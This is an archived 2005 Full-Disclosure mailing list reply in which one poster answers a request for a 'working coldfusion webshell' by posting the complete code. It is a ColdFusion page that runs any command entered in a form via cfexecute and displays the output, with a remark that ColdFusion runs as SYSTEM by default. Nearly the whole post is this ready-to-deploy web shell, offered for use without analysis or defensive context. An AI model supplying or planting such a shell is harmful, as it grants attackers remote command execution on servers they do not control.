Re: [Full-disclosure] coldfusion pentest

From: Kurt Grutzmacher (grutz_at_jingojango.net)
Date: 05/10/05

  • Next message: Valdis.Kletnieks_at_vt.edu: "Re: [Full-disclosure] Fwd: GWAVA Sender Notification (Content filter)"
    Date: Mon, 09 May 2005 20:13:34 -0700
    To: fatb <fatb@security.zz.ha.cn>
    
    

    fatb wrote:

    >anybody could be kind enough to send me a working coldfusion webshell
    >
    >
    ColdFusion runs as SYSTEM by default. Happy trails. (de-htmlized for
    hafe sex)

    &lt;html&gt;
    &lt;body&gt;

    &lt;cfoutput&gt;
    &lt;table&gt;
    &lt;form method="POST" action="cfexec.cfm"&gt;
    &lt;tr&gt;&lt;td&gt;Command:&lt;/td&gt;&lt;td&gt;&lt;input type=text
    name="cmd" size=50
    &lt;cfif
    isdefined("form.cmd")&gt;value="#form.cmd#"&lt;/cfif&gt;&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
    &lt;tr&gt;&lt;td&gt;Options:&lt;/td&gt;&lt;td&gt; &lt;input type=text
    name="opts" size=50
    &lt;cfif
    isdefined("form.opts")&gt;value="#form.opts#"&lt;/cfif&gt;&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
    &lt;tr&gt;&lt;td&gt;Timeout:&lt;/td&gt;&lt;td&gt; &lt;input type=text
    name="timeout" size=4
    &lt;cfif isdefined("form.timeout")&gt;value="#form.timeout#"
    &lt;cfelse&gt;value="5"&lt;/cfif&gt;&gt;&lt;/td&gt;&lt;/tr&gt;
    &lt;/table&gt;
    &lt;input type=submit value="Exec" &gt;
    &lt;/FORM&gt;

    &lt;cfsavecontent variable="myVar"&gt;
    &lt;cfexecute name = "#Form.cmd#"
    arguments = "#Form.opts#"
    timeout = "#Form.timeout#"&gt;
    &lt;/cfexecute&gt;
    &lt;/cfsavecontent&gt;
    &lt;pre&gt;
    #myVar#
    &lt;/pre&gt;
    &lt;/cfoutput&gt;
    &lt;/body&gt;
    &lt;/html&gt;

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/


  • Next message: Valdis.Kletnieks_at_vt.edu: "Re: [Full-disclosure] Fwd: GWAVA Sender Notification (Content filter)"